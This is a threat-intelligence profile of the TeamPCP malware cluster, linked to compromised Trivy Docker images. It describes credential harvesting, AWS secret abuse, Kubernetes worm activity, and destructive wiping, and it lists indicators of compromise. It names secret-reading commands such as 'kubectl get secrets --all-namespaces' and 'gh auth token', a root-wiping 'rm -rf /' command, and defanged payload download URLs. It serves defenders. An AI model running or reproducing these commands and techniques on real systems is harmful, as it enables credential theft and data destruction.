TeamPCP

TeamPCP is a cloud-native malware/threat cluster active in 2025 and 2026, also tracked under the aliases DeadCatx3, PCPcat, ShellForce, and CanisterWorm. It is most prominently associated with the March 2026 supply chain compromise of Aqua Security’s open-source Trivy vulnerability scanner, where malicious Docker Hub images for Trivy versions 0.69.4, 0.69.5, and 0.69.6 distributed TeamPCP infostealer code. The campaign was linked to broader compromise of Aqua Security GitHub assets, including unauthorized repository creation and defacement using the message "TeamPCP Owns Aqua Security," and investigators traced part of the intrusion to a compromised Argon-DevOps-Mgt service account token.

Across the provided reporting, TeamPCP is described as an information stealer focused on cloud-native and developer environments, with additional worm, ransomware, cryptomining, and destructive Kubernetes capabilities. Observed behavior includes host reconnaissance; harvesting credentials and secrets from environment variables, .env/.json/.yml/.yaml files, SSH keys, Docker secrets, Kubernetes secrets and service account tokens, WordPress configuration files, and developer tooling such as GitHub authentication tokens. In one analyzed Python .pth-based stealer wave, it executed reconnaissance commands such as hostname, whoami, uname -a, ip addr, ip route, printenv, kubectl get secrets --all-namespaces, wg showconf all, and gh auth token, and inspected /var/log/auth.log for accepted logins.

A notable TeamPCP capability is live AWS credential abuse. When AWS credentials are available in environment variables or via EC2 IMDS, the malware performs SigV4-authenticated API calls to enumerate and retrieve managed secrets, including secretsmanager:ListSecrets, secretsmanager:GetSecretValue, and ssm:DescribeParameters. This expands theft beyond files on disk to cloud-managed secrets. Collected data has been compressed into archives such as trin.tar.gz and exfiltrated over HTTPS using a custom actor-branded header; other reporting tied TeamPCP artifacts to exfiltration files payload.enc and tpcp.tar.gz.

TeamPCP is also Kubernetes-aware. Reporting states that its worm uses scripts such as proxy.sh to detect whether it is running inside a Kubernetes cluster and, if so, downloads and executes kube.py to harvest cluster credentials and discover resources via the Kubernetes API. In a modeled intrusion, TeamPCP checked for /var/run/secrets/kubernetes.io/serviceaccount/token, downloaded kube.py from 44.252.85[.]168:666/files/kube.py, and used it to enumerate pods and execute commands across the cluster. Additional observed behaviors include creating persistence via /etc/systemd/system/teampcp-react.service, installing tooling at runtime, deploying tunneling/proxy tools such as frps and gost, executing base64-decoded Python payloads, and reconstructing and launching a miner.

The content also attributes destructive activity to TeamPCP-linked payloads. Compromised Trivy images reportedly included functionality to wipe Iranian Kubernetes clusters using a container named kamikaze, and to erase non-Kubernetes Iranian hosts with rm -rf / --no-preserve-root. Separate reporting describes TeamPCP as capable of worm propagation into the npm ecosystem using stolen publish tokens, including a self-propagating CanisterWorm that used an Internet Computer Protocol canister as a dead drop resolver for command-and-control.

High-confidence indicators of compromise mentioned in the content include the typosquatted C2 domain scan.aquasecurtiy.org; exfiltration artifacts payload.enc, tpcp.tar.gz, and trin.tar.gz; references to the fallback GitHub repository tpcp-docs; the Trivy Docker Hub tags 0.69.4, 0.69.5, and 0.69.6; the persistence artifact /etc/systemd/system/teampcp-react.service; and infrastructure/URLs such as 67.217.57[.]240:666/files/proxy.sh and 44.252.85[.]168:666/files/kube.py described in TeamPCP intrusion scenarios.